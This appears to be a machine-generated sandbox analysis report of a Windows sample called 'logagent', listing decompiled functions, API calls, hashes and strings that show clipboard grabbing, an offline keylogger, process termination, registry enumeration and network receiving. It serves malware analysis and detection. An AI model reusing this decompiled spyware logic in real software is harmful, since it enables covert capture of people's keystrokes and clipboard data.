                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$D@2@@std@@D@std@@$??0?$basic_string@$??1?$basic_string@$?begin@?$basic_string@G@1@@$?c_str@?$basic_string@?end@?$basic_string@?length@?$basic_string@D@1@@V01@@
                                  • String ID:
                                  • API String ID: 384503197-0
                                  • Opcode ID: fc84d7bb029b3800a199890aa7fda8e35941668a1b6b46af4e7b1dfef16bc2af
                                  • Instruction ID: e9850064b0a36303cd24c251ff0e0265422eee26172e2298965a0cd1febf68d2
                                  • Opcode Fuzzy Hash: fc84d7bb029b3800a199890aa7fda8e35941668a1b6b46af4e7b1dfef16bc2af
                                  • Instruction Fuzzy Hash: 30F0DA7141021EEBCF04EFA0EC49CEE7779FB48254B444429F926D20A0EB75A659CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406BEF Relevance: 6.0, APIs: 4, Instructions: 27clipboardCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 27%
                                  			E00406BEF(void* __ecx, intOrPtr _a4) {
				char _v5;
				void* _t15;

				if(OpenClipboard(0) == 0) {
					L3:
					_push( &_v5);
					_push(0x415664);
				} else {
					_t15 = GetClipboardData(1);
					CloseClipboard();
					if(_t15 == 0) {
						goto L3;
					} else {
						_push( &_v5);
						_push(_t15);
					}
				}
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
				return _a4;
			}





                                  0x00406bfe
                                  0x00406c1b
                                  0x00406c1e
                                  0x00406c1f
                                  0x00406c00
                                  0x00406c08
                                  0x00406c0a
                                  0x00406c12
                                  0x00000000
                                  0x00406c14
                                  0x00406c17
                                  0x00406c18
                                  0x00406c18
                                  0x00406c12
                                  0x00406c27
                                  0x00406c32

                                  APIs
                                  • OpenClipboard.USER32(00000000), ref: 00406BF6
                                  • GetClipboardData.USER32 ref: 00406C02
                                  • CloseClipboard.USER32 ref: 00406C0A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?,?,00406C77,?,?,00000000,00000000,?,?,?,?,?,00405AF6), ref: 00406C27
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Clipboard$V?$allocator@$??0?$basic_string@CloseD@1@@D@2@@std@@D@std@@DataOpenU?$char_traits@
                                  • String ID:
                                  • API String ID: 1727351239-0
                                  • Opcode ID: d31ff5e3c6f90f495a0499d15105459c1e1ba467a64aad7b936036200359d4d3
                                  • Instruction ID: d068d5d9f876e73b388ef04ee2f39e673df6a44b067aa838ba22f5a803aba3f5
                                  • Opcode Fuzzy Hash: d31ff5e3c6f90f495a0499d15105459c1e1ba467a64aad7b936036200359d4d3
                                  • Instruction Fuzzy Hash: 05E03075504615EFE7409B50DC49FDA7BACDB85B52F408035B90ADA280D7749980CAA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004054E9 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 004054FC
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 0040550F
                                  • SetEvent.KERNEL32(?,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405518
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405527
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$V01@V01@@Y?$basic_string@$??1?$basic_string@Event
                                  • String ID:
                                  • API String ID: 3911305588-0
                                  • Opcode ID: 5e8272a8b6e28889ab6d8654449965f19fbf5b6a96bc948a22fd1af30fd28282
                                  • Instruction ID: de7088bd0e13ff88ad3ed09bf1a5158b73f18205d37a60fa436fa72f9884fc0a
                                  • Opcode Fuzzy Hash: 5e8272a8b6e28889ab6d8654449965f19fbf5b6a96bc948a22fd1af30fd28282
                                  • Instruction Fuzzy Hash: 06F08231400B49EFCB11DF60D848AD77FA8EF05244F448469E48382961D774F588CF98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D7C0 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 46%
                                  			E0040D7C0(void* __eflags) {
				char* _t5;
				void* _t20;

				_t5 = E0040180C(_t20 - 0x10, __eflags, 0);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				E004126BC(atoi(_t5));
				E004017DD(_t20 - 0x10);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}





                                  0x0040d7c5
                                  0x0040d7cc
                                  0x0040d7da
                                  0x0040e6a4
                                  0x0040e6ac
                                  0x0040e6b5
                                  0x0040e6c1

                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040D7CC
                                  • atoi.MSVCRT ref: 0040D7D3
                                    • Part of subcall function 004126BC: OpenProcess.KERNEL32(00000001,00000000,?), ref: 004126C9
                                    • Part of subcall function 004126BC: TerminateProcess.KERNEL32(00000000,00000000), ref: 004126D7
                                    • Part of subcall function 004126BC: CloseHandle.KERNEL32(00000000), ref: 004126E3
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@Process$?c_str@?$basic_string@CloseHandleOpenTerminateatoi
                                  • String ID:
                                  • API String ID: 1377568529-0
                                  • Opcode ID: 564291607d9638d041430aad6149658f0cca5fd975ad9575967f8846513cae85
                                  • Instruction ID: 2746f951d2caaa68166efb6d96d37f5946b4e222a380c15f16ac4a6add4f85c7
                                  • Opcode Fuzzy Hash: 564291607d9638d041430aad6149658f0cca5fd975ad9575967f8846513cae85
                                  • Instruction Fuzzy Hash: 54E0ED72914519CBCB04ABE1EC599ED7324EB90316F50483FE112E60E1EE785555CB1C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1054B691 Relevance: 6.0, APIs: 4, Instructions: 24COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E1054B691(void** _a4) {
				void* _t4;
				long _t5;
				struct HRSRC__* _t7;

				_t7 = FindResourceA(0, 0x4166b8, 0xa);
				_t4 = LockResource(LoadResource(0, _t7));
				_t5 = SizeofResource(0, _t7);
				 *_a4 = _t4;
				return _t5;
			}






                                  0x1054b6a5
                                  0x1054b6b1
                                  0x1054b6bc
                                  0x1054b6c6
                                  0x1054b6ca

                                  APIs
                                  • FindResourceA.KERNEL32(00000000,004166B8,0000000A), ref: 1054B69F
                                  • LoadResource.KERNEL32(00000000,00000000,?,?,?,1054B1CB,00000000), ref: 1054B6AA
                                  • LockResource.KERNEL32(00000000,?,?,?,1054B1CB,00000000), ref: 1054B6B1
                                  • SizeofResource.KERNEL32(00000000,00000000,?,?,?,1054B1CB,00000000), ref: 1054B6BC
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Resource$FindLoadLockSizeof
                                  • String ID:
                                  • API String ID: 3473537107-0
                                  • Opcode ID: 48e65bcaf9e34f3bd4814d5b8f3278eefd50652902c2b44e954c88ebdafe90fb
                                  • Instruction ID: dff85c0b1422ab4955d2beb391fe13d27272d16ce83a247481c219f138c774b2
                                  • Opcode Fuzzy Hash: 48e65bcaf9e34f3bd4814d5b8f3278eefd50652902c2b44e954c88ebdafe90fb
                                  • Instruction Fuzzy Hash: 27E09A31641714EBD6101BE5AC0DFDA7E78EBCAB63F0140A5FA098B1D0C561440086A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040DCD4 Relevance: 6.0, APIs: 4, Instructions: 23sleepCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 64%
                                  			E0040DCD4() {
				void* _t15;
				intOrPtr _t19;

				E0040AC8C();
				exit(0);
				while(1) {
					_t19 =  *0x41beb8; // 0x0
					if(_t19 == 0) {
						break;
					}
					Sleep(0x64);
				}
				E00408245();
				E004017DD(_t15 - 0x10);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}





                                  0x0040dcd4
                                  0x0040dcdb
                                  0x0040dce3
                                  0x0040dce3
                                  0x0040dce9
                                  0x00000000
                                  0x00000000
                                  0x0040dced
                                  0x0040dced
                                  0x0040dcf5
                                  0x0040e6a4
                                  0x0040e6ac
                                  0x0040e6b5
                                  0x0040e6c1

                                  APIs
                                    • Part of subcall function 0040AC8C: TerminateProcess.KERNEL32(00000000,00000000,004085BA), ref: 0040AC9C
                                    • Part of subcall function 0040AC8C: WaitForSingleObject.KERNEL32(000000FF), ref: 0040ACAF
                                  • exit.MSVCRT ref: 0040DCDB
                                  • Sleep.KERNEL32(00000064), ref: 0040DCED
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ??1?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$ObjectProcessSingleSleepTerminateWaitexit
                                  • String ID:
                                  • API String ID: 772260455-0
                                  • Opcode ID: 5aace0361de9191413dc271bf8bd4434801403ba898cda7487336363dda204b6
                                  • Instruction ID: 3edd35d2a09f3996059eabe09ae33406840b09248e651dbbdf397ea46066b4da
                                  • Opcode Fuzzy Hash: 5aace0361de9191413dc271bf8bd4434801403ba898cda7487336363dda204b6
                                  • Instruction Fuzzy Hash: 8DE0E531918619DFE304ABE1ED59BDD7730AB60346F50443AE603A60E1DAF9051ADB1A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 10544E02 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 228networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • recv.WS2_32(?,?,0000FDE8,00000000), ref: 10544EA6
                                    • Part of subcall function 105539CA: GetLocalTime.KERNEL32(?), ref: 105539E1
                                    • Part of subcall function 105539CA: printf.MSVCRT ref: 10553A4E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LocalTimeprintfrecv
                                  • String ID: [DEBUG]$dVA
                                  • API String ID: 875807815-1987307633
                                  • Opcode ID: b60463dbdbff701d3f326422711d0b02361bd4feaec76e4a133b4563da488f67
                                  • Instruction ID: aa6222fac86f690c9735488f1a1259fe0ebb3ebd254a4c11fdf5479a0761db50
                                  • Opcode Fuzzy Hash: b60463dbdbff701d3f326422711d0b02361bd4feaec76e4a133b4563da488f67
                                  • Instruction Fuzzy Hash: 8E81087290050DEBCB04AB90DC999EEBF79EB84355F104065F516E31A0EF706A89CFA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1054D7C3 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 34%
                                  			E1054D7C3(char _a4, short* _a20, intOrPtr _a24, char _a27) {
				void* _v8;
				char _v24;
				char _v40;
				char _v56;
				char _v72;
				char _v88;
				char _v104;
				char _v120;
				char _v136;
				char _v152;
				void* _t29;
				long _t30;
				void* _t38;
				char* _t41;
				char* _t42;
				char* _t43;
				char* _t44;
				char* _t45;
				char* _t46;
				char* _t47;
				void* _t70;
				void* _t72;
				void* _t89;
				void* _t93;
				void* _t95;

				 *0x41533c();
				_t29 = E1054D72A( &_a4);
				_t95 = _t93 - 0x10 + 0x10;
				_t63 = 0;
				_t30 = RegOpenKeyExW(_t29, _a20, 0, 0x20019,  &_v8);
				_t106 = _t30;
				if(_t30 != 0) {
					 *0x415318( &_a27);
					E10543A51(0x41bde0, 0x72, 0x415b1c);
				} else {
					E1054D4AF( &_v8, _t106, _v8);
					_pop(_t70);
					_t89 = 0x415b14;
					if(_a24 != 0) {
						_t89 = 0x415908;
					}
					_t38 = E105541E4(_t70,  &_v152, 0x41bdd0);
					_t72 = 0x41b310;
					_t41 =  &_v88;
					L10555B05();
					_t42 =  &_v56;
					L10555ACF();
					_t43 =  &_v40;
					L10555ACF();
					_t44 =  &_v24;
					L10555ACF();
					_t45 =  &_v72;
					L10555ACF();
					_t46 =  &_v104;
					L10555ACF();
					_t47 =  &_v136;
					L10555ACF();
					L10555ACF();
					E10543A51(0x41bde0, 0x71, _t95 - 0x10);
					 *0x415348(_t47, _t47, _t46, _t46, _t45, _t45, _t44, _t44, _t43, _t43, _t42, _t42, _t41, _t41, _t89, 0x41b310, E105541E4(_t72,  &_v120, 0x41be40), 0x41b310, _t38, 0x41be30, 0x41b310, 0x41be50);
					 *0x415348();
					 *0x415348();
					 *0x415348();
					 *0x415348();
					 *0x415348();
					 *0x415348();
					 *0x415348();
					 *0x415348();
					 *0x415204(0x415800);
					 *0x415204(0x415800);
					 *0x4152c8(0x415664);
					 *0x4152c8(0x415664);
					RegCloseKey(_v8);
					_t63 = 1;
				}
				 *0x415348();
				return _t63;
			}




























                                  0x1054d7d8
                                  0x1054d7de
                                  0x1054d7e3
                                  0x1054d7e9
                                  0x1054d7f6
                                  0x1054d7fc
                                  0x1054d7fe
                                  0x1054d979
                                  0x1054d986
                                  0x1054d804
                                  0x1054d807
                                  0x1054d80f
                                  0x1054d810
                                  0x1054d815
                                  0x1054d817
                                  0x1054d817
                                  0x1054d83e
                                  0x1054d844
                                  0x1054d859
                                  0x1054d85e
                                  0x1054d867
                                  0x1054d86b
                                  0x1054d874
                                  0x1054d878
                                  0x1054d881
                                  0x1054d885
                                  0x1054d88e
                                  0x1054d892
                                  0x1054d89b
                                  0x1054d89f
                                  0x1054d8a8
                                  0x1054d8af
                                  0x1054d8b9
                                  0x1054d8c8
                                  0x1054d8d3
                                  0x1054d8dc
                                  0x1054d8e5
                                  0x1054d8ee
                                  0x1054d8f7
                                  0x1054d900
                                  0x1054d909
                                  0x1054d912
                                  0x1054d91e
                                  0x1054d92f
                                  0x1054d93b
                                  0x1054d94c
                                  0x1054d958
                                  0x1054d961
                                  0x1054d967
                                  0x1054d967
                                  0x1054d98e
                                  0x1054d99a

                                  APIs
                                  • RegOpenKeyExW.ADVAPI32(00000000,?,00000000,00020019,?), ref: 1054D7F6
                                    • Part of subcall function 1054D4AF: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 1054D51E
                                    • Part of subcall function 1054D4AF: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 1054D54D
                                  • RegCloseKey.ADVAPI32(?), ref: 1054D961
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEnumInfoOpenQuery
                                  • String ID: dVA
                                  • API String ID: 1014704025-1571107130
                                  • Opcode ID: 4bf7dbed2e387c0bd0de4252c66f152a840cf4cd46a27f5795bf2d5b6f164994
                                  • Instruction ID: 75c8405a0be73e898a2ec8cd587b5051b530d4c1a808a09827ed6db2f08eab39
                                  • Opcode Fuzzy Hash: 4bf7dbed2e387c0bd0de4252c66f152a840cf4cd46a27f5795bf2d5b6f164994
                                  • Instruction Fuzzy Hash: 2441627690020CEBCB04ABE0ED5EDDE7F2CDB94245B144036F506D7161EB746E48CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1054B6CB Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 102sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 1054CE57: RegOpenKeyExA.ADVAPI32(80000001,105493F8,00000000,00020019,105493F8,?,?,?,105493F8,80000001,00000000), ref: 1054CE76
                                    • Part of subcall function 1054CE57: RegQueryValueExA.ADVAPI32(105493F8,?,00000000,80000001,?,00000000,80000001,?,?,?,105493F8,80000001,00000000), ref: 1054CE94
                                    • Part of subcall function 1054CE57: RegCloseKey.ADVAPI32(105493F8,?,?,?,105493F8,80000001,00000000), ref: 1054CE9F
                                  • Sleep.KERNEL32(00000BB8), ref: 1054B789
                                  • exit.MSVCRT ref: 1054B806
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseOpenQuerySleepValueexit
                                  • String ID: 2.7.1 Pro
                                  • API String ID: 3482962480-3399156737
                                  • Opcode ID: 86934927d20916fc64d935251dca7813c93599dfcb48ba5906bae101e05e4fe0
                                  • Instruction ID: a18f593abc72bbea4445ab1689bdc3d003340f84491b9807259f987cf71152be
                                  • Opcode Fuzzy Hash: 86934927d20916fc64d935251dca7813c93599dfcb48ba5906bae101e05e4fe0
                                  • Instruction Fuzzy Hash: B831C472A40508BBE704B7E49C4EAFE7F6CEFC4341F640065F911C6190EFA5598187AA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 10553E4D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  • abcdefghijklmnopqrstuvwxyz, xrefs: 10553E64
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: srandtime
                                  • String ID: abcdefghijklmnopqrstuvwxyz
                                  • API String ID: 4228891388-1277644989
                                  • Opcode ID: 15b0aad6ad470baee71e932c84e056877b09aa3be15cdb2110e7ae94f5adee03
                                  • Instruction ID: 7b6e0534dd4ebdc394a94ad9b7d895b79d61f29221bdbf90dbfad6202f42536d
                                  • Opcode Fuzzy Hash: 15b0aad6ad470baee71e932c84e056877b09aa3be15cdb2110e7ae94f5adee03
                                  • Instruction Fuzzy Hash: A511087354020DEBCB04EBA1EC49AEE3BB9EB80361F104026FD01E71D0DA719905CF64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 105476DF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49COMMON
                                  Download Yara Rule
                                  APIs
                                  • UnhookWindowsHookEx.USER32(00000000), ref: 1054774F
                                    • Part of subcall function 10547762: GetLocalTime.KERNEL32(?,?,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,10546B55), ref: 10547770
                                    • Part of subcall function 10547762: malloc.MSVCRT ref: 105477C6
                                    • Part of subcall function 10547762: sprintf.MSVCRT ref: 105477F8
                                    • Part of subcall function 10547762: SetEvent.KERNEL32(?), ref: 10547824
                                    • Part of subcall function 10547762: ??3@YAXPAX@Z.MSVCRT ref: 1054782B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ??3@EventHookLocalTimeUnhookWindowsmallocsprintf
                                  • String ID: Offline Keylogger Stopped$[INFO]
                                  • API String ID: 1154738628-1731565019
                                  • Opcode ID: 192f14234bd1f161141e7922fad76bd8ff8d85d38597ce7ceab77fd8c64afa54
                                  • Instruction ID: 16db7a6f5776c89e8ab68abe360fc14926a6cd3dd93f8be0b6baa1f2fab2ce64
                                  • Opcode Fuzzy Hash: 192f14234bd1f161141e7922fad76bd8ff8d85d38597ce7ceab77fd8c64afa54
                                  • Instruction Fuzzy Hash: 8F012D71A1024C6BE7006734CC497FE7FFCEB82150F904459E842C2641E7F8594987E5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 105475F1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42synchronizationCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 19%
                                  			E105475F1(void* __ecx) {
				void* _t14;
				void* _t22;
				void* _t23;

				_t22 = __ecx;
				 *(_t22 + 0x34) = CreateEventA(0, 0, 0, 0);
				if( *((char*)(_t22 + 0x3d)) != 0) {
					_t14 = _t22 + 0x14;
					do {
						_push(0x415664);
						_push(_t14);
						if( *0x4152e0() != 0) {
							_t23 = _t23 - 0x10;
							 *0x41533c();
							E10543A51(0x41be70, 0x5a, _t14);
							 *0x4152c8(0x415664);
						}
						WaitForSingleObject( *(_t22 + 0x34), 0xffffffff);
					} while ( *((char*)(_t22 + 0x3d)) != 0);
				}
				return 1;
			}






                                  0x105475f9
                                  0x10547606
                                  0x10547609
                                  0x1054760b
                                  0x10547613
                                  0x10547613
                                  0x10547614
                                  0x1054761f
                                  0x10547621
                                  0x10547627
                                  0x10547634
                                  0x1054763c
                                  0x1054763c
                                  0x10547647
                                  0x1054764d
                                  0x10547613
                                  0x10547658

                                  APIs
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,10546C42), ref: 105475FC
                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 10547647
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateEventObjectSingleWait
                                  • String ID: dVA
                                  • API String ID: 2678385144-1571107130
                                  • Opcode ID: faacb40d7c9ee4e4a379f73a54fcd7153b1e31e1dd7eb579bd7be44ae1484f67
                                  • Instruction ID: 1713aa071702119b5773a4f4598c3859c02d546d954d0f19aef28d3582161336
                                  • Opcode Fuzzy Hash: faacb40d7c9ee4e4a379f73a54fcd7153b1e31e1dd7eb579bd7be44ae1484f67
                                  • Instruction Fuzzy Hash: 8DF02275500B04BBDB105B289D8CBE73FAEEBC2361B50992DF453C2891CB61A8408B74
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406B61 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60( [LCtrl] ,?), ref: 00406B97
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$??0?$basic_string@D@1@@D@2@@std@@D@std@@U?$char_traits@
                                  • String ID: [LCtrl] $ [RCtrl]
                                  • API String ID: 4257247948-618823999
                                  • Opcode ID: 9f16e9fa14077babb8ed9855a1e050faffba71bb071577cb853db8c28f755885
                                  • Instruction ID: 4f70cad60a3ff704afd3fe8ce3074508994e3182d9d4e745bddae8050266d9bd
                                  • Opcode Fuzzy Hash: 9f16e9fa14077babb8ed9855a1e050faffba71bb071577cb853db8c28f755885
                                  • Instruction Fuzzy Hash: 60E092B17106147FEA14A66DD81BEFF36BCDB80754F40017AE802E72C1D9E96D4086EA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D8C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                    • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                    • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                    • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                    • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000000,00000001), ref: 0040D8E1
                                  • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 0040D8EE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
